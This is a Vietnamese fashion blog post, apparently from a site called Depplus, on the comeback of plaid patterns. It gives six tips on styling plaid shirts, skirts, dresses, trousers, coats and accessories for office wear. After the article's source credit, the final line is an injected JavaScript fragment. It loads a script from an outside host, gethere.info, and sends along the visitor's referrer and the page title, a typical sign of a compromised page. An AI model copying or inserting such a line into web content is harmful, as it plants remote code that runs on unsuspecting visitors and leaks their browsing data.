Sự trở lại của họa tiết kẻ caro

Sự trở lại của họa tiết kẻ caro
Vòng quay thời trang luôn thay đổi theo từng ngày, và các tín đồ thì luôn tìm cách để tìm về quá khứ, “khai quật” những điều đã cũ để biến nó trở lại trong hình dạng mới mẻ và hấp dẫn hơn. Năm nay, hạo tiết kẻ sọc ô vuông (plaid) chính là hiện tượng đó.
Họa tiết caro tuy không phải là điều mới lạ nhưng mùa mốt năm nay, chúng được làm mới và vận dụng vào rất nhiều các set đồ. Hãy cùng Depplus tìm tòi những trang phục có thể ứng dụng họa tiết này cho các cô nàng công sở trendy nhé.
1. Những chiếc áo kẻ sọc khỏe khoắn

Chiếc áo kẻ sọc có thể sử dụng suốt bốn mùa là lựa chọn hàng đầu cho những cô nàng trót yêu những ô vuông năng động này. Sự biến hóa của áo sơ mi kẻ sọc sẽ khiến bạn bất ngờ vì nó có thể mix cùng jeans cho mùa hè hay mặc trong sweater tạo phong cách preppy (trường học) đáng yêu mùa thu; và thành phụ kiện thắt ngang eo cho set đồ cá tính, đồng thời nó cũng dễ mix cùng các loại áo khoác từ áo da, áo bông mà không sợ bị lệch “tông”. Vì thế hãy chắc bạn có ít nhất một chiếc áo plaid trong tủ đồ nhé.

2. Nét cổ điển của chân váy

Khi tiết trời còn chưa quá lạnh thì một chiếc chân váy kẻ ô từ mùa hè là item hữu hiệu cho set đồ. Bạn có thể thoải mái kết hợp với áo khoác, áo sơ mi , áo sweater mỏng hay áo phông đơn giản mà vẫn ấn tượng và nổi bật.

3. Váy liền cho quý cô trưởng thành

Những quý cô công sở thanh lịch nếu còn e ngại với chân váy kẻ ô có thể hơi “trẻ con” thì hãy tự tin cùng váy liền, vì sự kín đáo, thanh lịch đầy cuốn hút của nó dễ dàng chiều lòng được tất cả mọi người.

4. Nhấn nhá với quần kẻ sọc

Khi đã chán ngán với quần jean hay không muốn đóng bộ cùng quần âu thì hãy thử thay đổi với những ô vuông cá tính và màu sắc của quần plaid. Chiếc quần caro sẽ không chỉ dành cho tuổi teen khi bạn biết kết hợp chúng cùng những item đơn giản để tạo cái nhìn sang trọng và lịch sự.

5. Ấm áp với áo khoác họa tiết kẻ ô

Những chiếc áo khoác là vật bất ly thân của mọi cô nàng khi mùa thu đông đến và với chiếc áo kẻ ô thì chẳng cần làm gì nhiều, tự nó sẽ khiến cho bề ngoài của bạn thật nổi bật và rạng rỡ cả khi những ngày trời u ám nhất.

6. Tô điểm màu sắc cùng phụ kiện

Ý tưởng về đôi giày cao gót dường như hơi lỗi mốt, tuy nhiên tương tự như khăn quàng cổ, nếu kết hợp nó với chiếc quần jeans phong cách nam tính và áo sweater rộng, trông bạn vẫn rất thời trang. Bạn cũng có thể bổ sung cho set đồ mùa đông của mình đôi găng tay kẻ caro ấm áp ton sur ton với khăn choàng.

Theo: mask

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;